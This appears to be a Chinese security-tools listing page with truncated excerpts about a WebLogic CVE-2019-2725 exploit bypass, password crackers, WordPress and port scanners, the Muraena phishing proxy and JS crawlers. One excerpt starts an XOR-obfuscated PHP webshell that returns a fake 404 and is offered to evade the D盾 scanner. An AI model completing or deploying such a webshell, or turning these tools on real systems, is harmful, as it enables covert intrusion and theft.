安全工具

CVE-2019-2725 bypass Weblogic反序列化远程代码执行漏洞（CVE-2019-2725） 受影响版本 Oracle WebLogic Server 10.*Oracle WebLogic Server 12.1.3 影响组件： bea_wls9_async_response.warwsat...

超级弱口令检查工具 SNETCracker超级弱口令检查工具是一款开源的Windows平台的弱口令安全审计工具，支持批量多线程检查，可快速发现弱密码、弱口令账号，密码支持和用户名结合进行检查，大大提高成功率，支持...

WPSeku介绍 WPSeku是一个黑盒WordPress漏洞扫描程序，可用于扫描WordPress的安全性，并查找漏洞，感觉和wpscan有点像，但介绍说WPSeku的想法来源于wpscan，那应该在某些方面有所突破吧。 WPSeku扫描工具界...

King-Hacking介绍 以前我们都是把看到合适的，喜欢的全部下载在电脑上，但慢慢的发现，99%的安全工具下载后都是闲置的，常用的就那么几款，今天发现这个小脚本，它列出了一些常用的分类并收集了常用的渗透测...

scanless介绍 scanless是一款使用在线端口扫描网站进行端口扫描的工具，因为使用了第三方扫描平台，所以进行端口扫描时可实现匿名扫描。 scanless安装与使用 # 下载 $ git clone https://github.co...

工具有点老旧，但昨天用到了，还不错，轻巧 网络资产信息扫描 在渗透测试(特别是内网渗透)中经常需要对目标进行网络资产收集，即探测对方服务器都有哪些IP，IP上开了哪些端口，端口上运行着哪些服务。 该...

之前给的过D盾一句话webshell现在都已被查杀，补个 <?php header('HTTP/1.1 404'); class ZXVG { public $c=''; public function __destruct() { $_0='&'^"\x47"; $_1='C'^"\x30"; $_2='A'^"\x32"; $...

Muraena介绍 Muraena是一个基于反向代理的自动化网络钓鱼工具。使用Go编程语言编写，支持HTTPS证书。该工具包含一个充当反向代理的小型web服务器和一个爬虫程序。该爬虫程序可以自动确定从合法网站代理哪些资...

JSFinder介绍 JSFinder是一款用作快速在网站的js文件中提取URL，子域名的脚本工具。 支持用法 简单爬取深度爬取批量指定URL/指定JS其他参数 以往我们子域名多数使用爆破或DNS中获得，这个脚本从JS文...

Crawlab介绍 Crawlab是一款基于Celery的爬虫分布式爬虫管理平台，支持多种编程语言以及多种爬虫框架。 Crawlab的架构跟Celery非常相似，但是加入了包括前端、爬虫、Flower在内的额外模块，以支持爬虫...